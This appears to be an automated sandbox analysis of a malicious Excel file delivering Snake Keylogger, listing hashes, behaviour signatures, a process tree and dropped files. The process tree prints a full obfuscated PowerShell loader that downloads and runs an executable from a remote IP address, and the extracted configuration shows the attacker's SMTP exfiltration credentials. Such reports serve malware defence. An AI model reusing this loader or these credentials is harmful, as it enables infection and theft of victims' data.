Analysis
-
max time kernel
137s -
max time network
140s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
04-10-2024 08:36
Static task
static1
Behavioral task
behavioral1
Sample
TTXAPPLICATION.xls
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
TTXAPPLICATION.xls
Resource
win10v2004-20240802-en
General
-
Target
TTXAPPLICATION.xls
-
Size
1.0MB
-
MD5
a88d8222f0c50bf06a91b3a9567c3306
-
SHA1
eb6afe8b34c4fd7c15104630e6a666322ba7420f
-
SHA256
e7163358d7945ac9fa343eb49725d8ce1021993347178b1f5725e4689fd35059
-
SHA512
0db10f1be93c95dda95425cff166e5ef87e3db6daa8f1ca882dd97a5a8f9bde893a3586bdd0a2ceeb744bd8d5c70b2c2a5c3388a1fe193a1d9501c76c8569259
-
SSDEEP
12288:xmzHJEHAfwu4hqD3DERnLRmF8DfPrf173d2FuLg70Je/mAI98dvj54002UZlAZ:gLw/hqbARM83V3uaGjS000
Malware Config
Extracted
snakekeylogger
Protocol: smtp- Host:
mail.teilecar.com - Port:
587 - Username:
[email protected] - Password:
Manta924porsche=911 - Email To:
[email protected]
Signatures
-
Snake Keylogger
Keylogger and Infostealer first seen in November 2020.
-
Snake Keylogger payload 3 IoCs
resource yara_rule behavioral1/memory/3060-64-0x0000000000400000-0x0000000000426000-memory.dmp family_snakekeylogger behavioral1/memory/3060-66-0x0000000000400000-0x0000000000426000-memory.dmp family_snakekeylogger behavioral1/memory/3060-65-0x0000000000400000-0x0000000000426000-memory.dmp family_snakekeylogger -
Blocklisted process makes network request 3 IoCs
flow pid Process 12 2740 mshta.exe 13 2740 mshta.exe 15 648 powershell.exe -
Downloads MZ/PE file
-
Evasion via Device Credential Deployment 1 IoCs
pid Process 648 powershell.exe -
Executes dropped EXE 1 IoCs
pid Process 1548 taskhostw.exe -
Loads dropped DLL 1 IoCs
pid Process 648 powershell.exe -
Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegSvcs.exe Key opened \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegSvcs.exe Key opened \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegSvcs.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 16 checkip.dyndns.org -
AutoIT Executable 1 IoCs
AutoIT scripts compiled to PE executables.
resource yara_rule behavioral1/files/0x00060000000193b7-61.dat autoit_exe -
Drops file in System32 directory 1 IoCs
description ioc Process File opened for modification C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 1548 set thread context of 3060 1548 taskhostw.exe 41 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 8 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language csc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cvtres.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskhostw.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RegSvcs.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language EXCEL.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe -
Enumerates system info in registry 2 TTPs 1 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\FloatingPointProcessor EXCEL.EXE -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\Main mshta.exe -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid Process 320 EXCEL.EXE -
Suspicious behavior: EnumeratesProcesses 5 IoCs
pid Process 648 powershell.exe 648 powershell.exe 648 powershell.exe 3060 RegSvcs.exe 3060 RegSvcs.exe -
Suspicious behavior: MapViewOfSection 1 IoCs
pid Process 1548 taskhostw.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 648 powershell.exe Token: SeDebugPrivilege 3060 RegSvcs.exe -
Suspicious use of SetWindowsHookEx 5 IoCs
pid Process 320 EXCEL.EXE 320 EXCEL.EXE 320 EXCEL.EXE 320 EXCEL.EXE 320 EXCEL.EXE -
Suspicious use of WriteProcessMemory 28 IoCs
description pid Process procid_target PID 2740 wrote to memory of 1716 2740 mshta.exe 34 PID 2740 wrote to memory of 1716 2740 mshta.exe 34 PID 2740 wrote to memory of 1716 2740 mshta.exe 34 PID 2740 wrote to memory of 1716 2740 mshta.exe 34 PID 1716 wrote to memory of 648 1716 cmd.exe 36 PID 1716 wrote to memory of 648 1716 cmd.exe 36 PID 1716 wrote to memory of 648 1716 cmd.exe 36 PID 1716 wrote to memory of 648 1716 cmd.exe 36 PID 648 wrote to memory of 1704 648 powershell.exe 37 PID 648 wrote to memory of 1704 648 powershell.exe 37 PID 648 wrote to memory of 1704 648 powershell.exe 37 PID 648 wrote to memory of 1704 648 powershell.exe 37 PID 1704 wrote to memory of 1660 1704 csc.exe 38 PID 1704 wrote to memory of 1660 1704 csc.exe 38 PID 1704 wrote to memory of 1660 1704 csc.exe 38 PID 1704 wrote to memory of 1660 1704 csc.exe 38 PID 648 wrote to memory of 1548 648 powershell.exe 40 PID 648 wrote to memory of 1548 648 powershell.exe 40 PID 648 wrote to memory of 1548 648 powershell.exe 40 PID 648 wrote to memory of 1548 648 powershell.exe 40 PID 1548 wrote to memory of 3060 1548 taskhostw.exe 41 PID 1548 wrote to memory of 3060 1548 taskhostw.exe 41 PID 1548 wrote to memory of 3060 1548 taskhostw.exe 41 PID 1548 wrote to memory of 3060 1548 taskhostw.exe 41 PID 1548 wrote to memory of 3060 1548 taskhostw.exe 41 PID 1548 wrote to memory of 3060 1548 taskhostw.exe 41 PID 1548 wrote to memory of 3060 1548 taskhostw.exe 41 PID 1548 wrote to memory of 3060 1548 taskhostw.exe 41 -
outlook_office_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegSvcs.exe -
outlook_win_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegSvcs.exe
Processes
-
C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\TTXAPPLICATION.xls1⤵
- System Location Discovery: System Language Discovery
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
PID:320
-
C:\Windows\SysWOW64\mshta.exeC:\Windows\SysWOW64\mshta.exe -Embedding1⤵
- Blocklisted process makes network request
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
PID:2740 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" "/C POWeRSHELL -Ex BYPass -NOP -w 1 -c DEvICEcrEDENTiAlDEPlOyMeNT.EXe ; iEX($(ieX('[sYstem.tEXt.ENcODiNG]'+[Char]58+[CHAr]58+'uTF8.GETSTRiNG([sysTem.cOnVert]'+[cHAR]0X3a+[CHaR]58+'fROMbaSe64sTRIng('+[char]34+'JDFIaWVNN24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYURELVR5UEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbWVtQmVyZEVGSW5pVElPbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVckxNT24uRExMIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdkUsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdGJCbixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB6Q3JWQ1p0aCx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgaktGR1Nmd3ZhaVIsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTW5UT3EpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbkFNRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJ2UXdRT05JalVjbSIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbkFNRXNQQWNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTUFnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICQxSGllTTduOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTcyLjI0NS4xMjMuNi8yODAvdGFza2hvc3R3LmV4ZSIsIiRFbnY6QVBQREFUQVx0YXNraG9zdHcuZXhlIiwwLDApO1NUQVJULXNMRWVwKDMpO3NUYVJ0ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFbnY6QVBQREFUQVx0YXNraG9zdHcuZXhlIg=='+[cHAR]34+'))')))"2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1716 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exePOWeRSHELL -Ex BYPass -NOP -w 1 -c DEvICEcrEDENTiAlDEPlOyMeNT.EXe ; iEX($(ieX('[sYstem.tEXt.ENcODiNG]'+[Char]58+[CHAr]58+'uTF8.GETSTRiNG([sysTem.cOnVert]'+[cHAR]0X3a+[CHaR]58+'fROMbaSe64sTRIng('+[char]34+'JDFIaWVNN24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYURELVR5UEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbWVtQmVyZEVGSW5pVElPbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVckxNT24uRExMIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdkUsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdGJCbixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB6Q3JWQ1p0aCx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgaktGR1Nmd3ZhaVIsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTW5UT3EpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbkFNRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJ2UXdRT05JalVjbSIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbkFNRXNQQWNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTUFnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICQxSGllTTduOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTcyLjI0NS4xMjMuNi8yODAvdGFza2hvc3R3LmV4ZSIsIiRFbnY6QVBQREFUQVx0YXNraG9zdHcuZXhlIiwwLDApO1NUQVJULXNMRWVwKDMpO3NUYVJ0ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFbnY6QVBQREFUQVx0YXNraG9zdHcuZXhlIg=='+[cHAR]34+'))')))"3⤵
- Blocklisted process makes network request
- Evasion via Device Credential Deployment
- Loads dropped DLL
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:648 -
C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\oyrfgqdz.cmdline"4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1704 -
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESDFF4.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCDFE4.tmp"5⤵
- System Location Discovery: System Language Discovery
PID:1660
-
-
-
C:\Users\Admin\AppData\Roaming\taskhostw.exe"C:\Users\Admin\AppData\Roaming\taskhostw.exe"4⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
PID:1548 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"C:\Users\Admin\AppData\Roaming\taskhostw.exe"5⤵
- Accesses Microsoft Outlook profiles
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- outlook_office_path
- outlook_win_path
PID:3060
-
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
717B
MD5822467b728b7a66b081c91795373789a
SHA1d8f2f02e1eef62485a9feffd59ce837511749865
SHA256af2343382b88335eea72251ad84949e244ff54b6995063e24459a7216e9576b9
SHA512bacea07d92c32078ca6a0161549b4e18edab745dd44947e5f181d28cc24468e07769d6835816cdfb944fd3d0099bde5e21b48f4966824c5c16c1801712303eb6
-
Filesize
504B
MD5e83da614a56b0d687459c7c66d655508
SHA19c56d105eeca4ed833ad1ac85bfdc983467619f4
SHA2560dfb3e8bfcaf61c58859eb1ff31961a591332aeda11fe6df64612fbd039872e4
SHA51297cb55d600c3693c68757d81340c2cb95ee298faeefec384ebfc7a6c76c7f98acce07556d488502e2f7d71aee5d5b43d6a9dc93ba97331d8133263bf59417fc8
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751
Filesize192B
MD5f14ac3dd404ca56c050cace5f5038824
SHA1950ecb00d399dccf1e4558d07c48d0cff67c02fb
SHA256f6483fe95bd3c44cf44f7ab4f092cfc7bfb392452eedf89acce7adda07b7f01f
SHA51230f0f628ebf51de7289affe3ad658e211006fde67ead637e746da84e573914cfbc66b729d8331cdf5842e701462ee1bf253f2a50cb9056c06875c66393af54fd
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\84E5DB7D6CF82B1C16085F0DF3A4BCE7
Filesize546B
MD5856dc98311087415fb3d97c15a115611
SHA1f1eb3f5daef33cd01bb2c5a4ccaa0384cda31a77
SHA2563968f5cc65c90268091a56c5d04eb7f4ca0d2ffdd4c876cc63200098715a0024
SHA512e5309e34501342f4d7604c9c86c2fc0ba2cba23e82f6a6cab3c4d7c3369371a5e2006a2c508f006022a584d6c5f20e136ecfb885d0700328db6ba3be2fac7127
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\Y8UFEBH5\newserviceupdation[1].hta
Filesize8KB
MD5cf19efb65170759203405e46dc871d97
SHA156f7b49dfeec086c3ab3a3a3dff1812beea8334b
SHA2566670374e84ce7f4c5fd02ee4d31e9f268d636658d38dbcea813967c6431fc0fe
SHA5121c2a7f1151cb70882d6aff7dfc02eae0c5504ca213672c6044af82d2444b5520e8a4263cd4c06dabcbedd9fcc1ade4d37bc2e0a5b6dd4af2d02734bdc07773a1
-
Filesize
70KB
MD549aebf8cbd62d92ac215b2923fb1b9f5
SHA11723be06719828dda65ad804298d0431f6aff976
SHA256b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f
SHA512bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b
-
Filesize
1KB
MD54e5537c3b9a853f3d5b918e3441ba03c
SHA143435b3335235d337b6bdf8e5e9defdfe838a0c0
SHA2560594c96f4eb8e05f371aecb2e70a262d857f0f76acc2c03d59318129b3cb3166
SHA5120499b9e8798ea427f33b65e0c556ade7e0d46fe6301e4158711bf5854f250f658150c7ff5ce5c3b0d9adaea7d120b8592f7b3f982524d597c7c1d119c55a3b8c
-
Filesize
3KB
MD5ea09e8b5ced8aa118a224c62fbeb10d6
SHA1eed2a0ca8a02b957dd8cfc9cf3638a1386b1340c
SHA2561581d20fbb6b3f9d18fddf5ba8c85483ff03a45f96589a2729069010e10484c4
SHA512002f4b0a7c52547f55223a42b12212cda440a0b0c5cdc7241c6600b6b53eed89923add8908725e2816c5eaf5dfd2edcd08e741d137c185e6c0ea362ea45a6164
-
Filesize
7KB
MD53e10f73fcb41b759a2cfd75285500de8
SHA1612b9867e35aeb3e3bdd5b03800648133eee0f79
SHA256a72d9e91daef2b0806c324b1d562a52da8b542c176c7f8c79601c8947f12bb28
SHA512051aa472129ee87cf69543333db030db172f9d17e5df30aecd8116f9d3595968eff57cd0bb6bf6fd4c2af5ca50a2717e4bac5df866fa42bff22e6468e0d9d6ab
-
Filesize
941KB
MD53573191164a6938ae79c1d2aba8a38fa
SHA13a1c2a7669055d470c0918ed1b441387ea5e940d
SHA256efe22938d34401515a5820f9bc7982921f42a65bd2ed9a9f2ef6dfda534e2500
SHA5123c768db1f33a0c38aa73ba2d7db1c044ae089fc4a1bfdcc22032b2b65f8b3532b68991adcf0cdb6b07c00a61f8f1ecf26c0c1e95169ce15ce62aa3a87b9121f6
-
Filesize
652B
MD5e3cf20ae7aed2bcd8a77e80f57a91022
SHA17bc880b95723c3ceb48ebbdafe6894e22963d9a4
SHA256207ea2762ff132833cbba8d76c4d993b6c2940a967d48640cb69e6faba83cd50
SHA512ed12b09791873206c184f00ea996e24da7703751bb2b3d7143a3f76e2fe0d36acad701ea3ffb64300aa86af34e6545d4c39a5feb8068174a8783c0a796ac0fba
-
Filesize
481B
MD57a5c1e0b06cc6f06cecbd9bc851739e0
SHA169fbe90e70a9cebb5a9af8afdabbfc72c6bc679a
SHA25681ea592f9c853de03314de17a3b8d1533a08013f295333ffe60b9e4bdc9872c1
SHA512166e754b88d9a7c505ba816beea8934c181895006d993c5ccba159c5f1b8d1fe0fa9fa0f756b080a85ee42079b285fc20bff21ab5aa5c7a3ebc8359e5bc50f3f
-
Filesize
309B
MD52b2e9aac37857b3571c5d8059b2f0ee7
SHA17f404b0b4c32a7ce2f35ceb0b41336cd223f8acc
SHA25618707ace99bd99d723ca19af68850ec26603557216c75fd4f0c23bb43525a0e4
SHA5125a11597fa87c80df9af5fde62534f04a8b66f07e615ed1775b972e831dc19393b46cb8fda001afd7dbda176d7a17f97cf4d7b0af6ad3039b6dc5e1767305cb0e